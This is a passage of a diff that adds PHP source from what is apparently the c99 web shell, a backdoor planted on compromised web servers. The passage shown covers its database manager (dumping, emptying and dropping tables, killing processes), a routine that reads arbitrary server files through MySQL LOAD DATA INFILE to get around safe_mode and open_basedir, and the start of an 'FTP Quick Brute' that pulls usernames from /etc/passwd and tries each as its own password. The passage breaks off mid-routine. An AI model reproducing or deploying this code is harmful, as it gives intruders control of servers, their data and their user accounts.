+      elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+      elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+      elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+      elseif ($sql_tbl_act == "insert") {
+        if ($sql_tbl_insert_radio == 1) {
+          $keys = "";
+          $akeys = array_keys($sql_tbl_insert);
+          foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+          if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+          $values = "";
+          $i = 0;
+          foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+          if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+          $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+        elseif ($sql_tbl_insert_radio == 2) {
+          $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+          $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+          $result = mysql_query($sql_query) or print(mysql_smarterror());
+          $result = mysql_fetch_array($result, MYSQL_ASSOC);
+          $sql_act = "query";
+          $sql_tbl_act = "browse";
+        }
+      }
+      if ($sql_act == "query") {
+        echo "<hr size=\"1\" noshade>";
+        if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+        if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+        if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\"> <input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+      }
+      if (in_array($sql_act,$acts)) {
+        ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="newtbl">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>">
+        <input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>">
+        <input type="text" name="sql_newtbl" size="20">
+        <input type="submit" value="Create">
+        </form></td>
+        <td width="30%" height="1"><b>Dump DB:</b>
+        <form action="<?php echo $surl; ?>">
+        <input type="hidden" name="act" value="sql">
+        <input type="hidden" name="sql_act" value="dump">
+        <input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>">
+        <input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>">
+        <input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>">
+        <input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>"><input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table>
+        <?php
+        if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+        if ($sql_act == "newtbl") {
+          echo "<b>";
+          if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
+            echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+          }
+          else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+        }
+        elseif ($sql_act == "dump") {
+          if (empty($submit)) {
+            $diplay = FALSE;
+            echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+            echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+            $v = join (";",$dmptbls);
+            echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+            if ($dump_file) {$tmp = $dump_file;}
+            else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+            echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+            echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+            echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+            echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+            echo "</form>";
+          }
+          else {
+            $diplay = TRUE;
+            $set = array();
+            $set["sock"] = $sql_sock;
+            $set["db"] = $sql_db;
+            $dump_out = "download";
+            $set["print"] = 0;
+            $set["nl2br"] = 0;
+            $set[""] = 0;
+            $set["file"] = $dump_file;
+            $set["add_drop"] = TRUE;
+            $set["onlytabs"] = array();
+            if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+            $ret = mysql_dump($set);
+            if ($sql_dump_download) {
+              @ob_clean();
+              header("Content-type: application/octet-stream");
+              header("Content-length: ".strlen($ret));
+              header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+              echo $ret;
+              exit;
+            }
+            elseif ($sql_dump_savetofile) {
+              $fp = fopen($sql_dump_file,"w");
+              if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+              else {
+                fwrite($fp,$ret);
+                fclose($fp);
+                echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+              }
+            }
+            else {echo "<b>Dump: nothing to do!</b>";}
+          }
+        }
+        if ($diplay) {
+    if (!empty($sql_tbl)) {
+      if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+      $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+      $count_row = mysql_fetch_array($count);
+      mysql_free_result($count);
+      $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+      $tbl_struct_fields = array();
+      while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+      if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+      if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+      if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+      if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+      $perpage = $sql_tbl_le - $sql_tbl_ls;
+      if (!is_numeric($perpage)) {$perpage = 10;}
+      $numpages = $count_row[0]/$perpage;
+      $e = explode(" ",$sql_order);
+      if (count($e) == 2) {
+        if ($e[0] == "d") {$asc_desc = "DESC";}
+        else {$asc_desc = "ASC";}
+        $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+      }
+      else {$v = "";}
+      $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+      $result = mysql_query($query) or print(mysql_smarterror());
+      echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[<b> Structure </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[<b> Browse </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[<b> Dump </b>]</a>&nbsp;&nbsp;&nbsp;";
+      echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+      if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+      if ($sql_tbl_act == "insert") {
+        if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+        if (!empty($sql_tbl_insert_radio)) {  } //Not Ready
+        else {
+          echo "<br><br><b>Inserting row into table:</b><br>";
+          if (!empty($sql_tbl_insert_q)) {
+            $sql_query = "SELECT * FROM `".$sql_tbl."`";
+            $sql_query .= " WHERE".$sql_tbl_insert_q;
+            $sql_query .= " LIMIT 1;";
+            $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+            $values = mysql_fetch_assoc($result);
+            mysql_free_result($result);
+          }
+          else {$values = array();}
+          echo "<form method=\"POST\"><table width=\"1%\" border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+          foreach ($tbl_struct_fields as $field) {
+            $name = $field["Field"];
+            if (empty($sql_tbl_insert_q)) {$v = "";}
+            echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+            $i++;
+          }
+          echo "</table><br>";
+          echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+          if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+          echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+        }
+      }
+      if ($sql_tbl_act == "browse") {
+        $sql_tbl_ls = abs($sql_tbl_ls);
+        $sql_tbl_le = abs($sql_tbl_le);
+        echo "<hr size=\"1\" noshade>";
+        echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
+        $b = 0;
+        for($i=0;$i<$numpages;$i++) {
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+          echo $i;
+          if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+          if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+          else {echo "&nbsp;";}
+        }
+        if ($i == 0) {echo "empty";}
+        echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+        echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>";
+        echo "<tr>";
+        echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+        for ($i=0;$i<mysql_num_fields($result);$i++) {
+          $v = mysql_field_name($result,$i);
+          if ($e[0] == "a") {$s = "d"; $m = "asc";}
+          else {$s = "a"; $m = "desc";}
+          echo "<td>";
+          if (empty($e[0])) {$e[0] = "a";}
+          if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+          else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
+          echo "</td>";
+        }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>+</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act)) {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb") {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus") {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars") {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes") {
+     if (!empty($kill)) {
+       $query = "KILL ".$kill.";";
+       $result = mysql_query($query, $sql_sock);
+       echo "<b>Process #".$kill." was killed.</b>";
+     }
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+}
+echo "</td></tr></table>";
+if ($sql_sock) {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
+}
+echo "</table>";
+}
+//End of SQL Manager
+if ($act == "ftpquickbrute") {
+echo "<center><table><tr><td class=barheader colspan=2>";
+echo ".: Ftp Quick Brute :.</td></tr>";
+echo "<tr><td>";
+if ($win) {echo "Couldn't run on Windows!";}
+else {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) {
+    if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+    else {$TRUE = TRUE;}
+    if ($TRUE) {
+      $sock = @ftp_connect($host,$port,$timeout);
+      if (@ftp_login($sock,$login,$pass)) {
+        echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+        ob_flush();
+        return TRUE;
+      }
+    }
+  }
+  if (!empty($submit)) {
+    if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+    $fp = fopen("/etc/passwd","r");
+    if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+    else {
+      if ($fqb_logging) {
+        if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+        else {$fqb_logfp = FALSE;}
+        $fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+        if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      }
+      ob_flush();
+      $i = $success = 0;
+      $ftpquick_st = getmicrotime();
+      while(!feof($fp)) {
+        $str = explode(":",fgets($fp,2048));
+        if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) {
+          echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+          $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+          if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+          $success++;
+          ob_flush();
+        }
+        if ($i > $fqb_lenght) {break;}
+        $i++;
+      }
+      if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+      $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+      echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
